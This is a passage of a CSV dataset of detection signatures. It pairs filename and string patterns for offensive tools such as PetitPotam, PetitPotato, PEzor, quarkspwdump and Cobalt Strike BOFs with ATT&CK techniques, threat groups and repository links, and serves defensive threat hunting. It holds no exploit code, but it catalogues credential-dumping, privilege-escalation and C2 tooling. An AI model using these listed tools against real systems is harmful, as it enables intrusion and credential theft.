Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54705" "*persist-ice-monitor.o*",".{0,1000}persist\-ice\-monitor\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54706" "*persist-ice-shortcut.o*",".{0,1000}persist\-ice\-shortcut\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A 
BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54707" "*persist-ice-time.o*",".{0,1000}persist\-ice\-time\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54708" "*persist-ice-xll.o*",".{0,1000}persist\-ice\-xll\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54709" "*PersStartup.cs*",".{0,1000}PersStartup\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","54710" "*PEScrambler.exe*",".{0,1000}PEScrambler\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","54711" 
"*peterdocter/quarkspwdump*",".{0,1000}peterdocter\/quarkspwdump.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","1","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","54712" "*PetitPotam bypass via RPC_C_AUTHN_LEVEL_PKT_PRIVACY*",".{0,1000}PetitPotam\sbypass\svia\sRPC_C_AUTHN_LEVEL_PKT_PRIVACY.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54713" "*PetitPotam.cna*",".{0,1000}PetitPotam\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54714" "*PetitPotam.cpp*",".{0,1000}PetitPotam\.cpp.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54715" "*PetitPotam.exe*",".{0,1000}PetitPotam\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and 
reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54716" "*PetitPotam.exe*",".{0,1000}PetitPotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54717" "*PetitPotam.ps1*",".{0,1000}PetitPotam\.ps1.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54718" "*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","54719" "*petitpotam.py*",".{0,1000}petitpotam\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black 
Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","54720" "*petitpotam.py*",".{0,1000}petitpotam\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54721" "*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54722" "*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","54723" "*PetitPotam.sln*",".{0,1000}PetitPotam\.sln.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54724" "*PetitPotam.sln*",".{0,1000}PetitPotam\.sln.{0,1000}","offensive_tool_keyword","petipotam","PoC 
tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54725" "*PetitPotam.vcxproj*",".{0,1000}PetitPotam\.vcxproj.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54726" "*PetitPotam:main*",".{0,1000}PetitPotam\:main.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","54727" "*petitpotam_check*",".{0,1000}petitpotam_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","54728" "*PetitPotamModified.exe*",".{0,1000}PetitPotamModified\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","54729" "*PetitPotato 3 cmd*",".{0,1000}PetitPotato\s3\scmd.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54730" "*PetitPotato.Build.CppClean.log,*",".{0,1000}PetitPotato\.Build\.CppClean\.log,.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54731" "*PetitPotato.exe*",".{0,1000}PetitPotato\.exe.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54732" "*PetitPotato.lastbuildstate*",".{0,1000}PetitPotato\.lastbuildstate.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","54733" "*PEzor generated Beacon Object File*",".{0,1000}PEzor\sgenerated\sBeacon\sObject\sFile.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54734" "*PEzor!! 
v*",".{0,1000}PEzor!!\sv.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54735" "*PEzor*/Inject.c*",".{0,1000}PEzor.{0,1000}\/Inject\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54736" "*Pezor*inject.hpp*",".{0,1000}Pezor.{0,1000}inject\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 
- T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54737" "*PEzor.sh -*",".{0,1000}PEzor\.sh\s\-.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54738" "*PEzor.sh *.bin*",".{0,1000}PEzor\.sh\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54739" "*PEzor.sh -32*",".{0,1000}PEzor\.sh\s\-32.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54740" "*PEzor.sh -64*",".{0,1000}PEzor\.sh\s\-64.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54741" "*PEzor/*/bof.cpp*",".{0,1000}PEzor\/.{0,1000}\/bof\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54742" "*PEzor/*syscalls.hpp*",".{0,1000}PEzor\/.{0,1000}syscalls\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
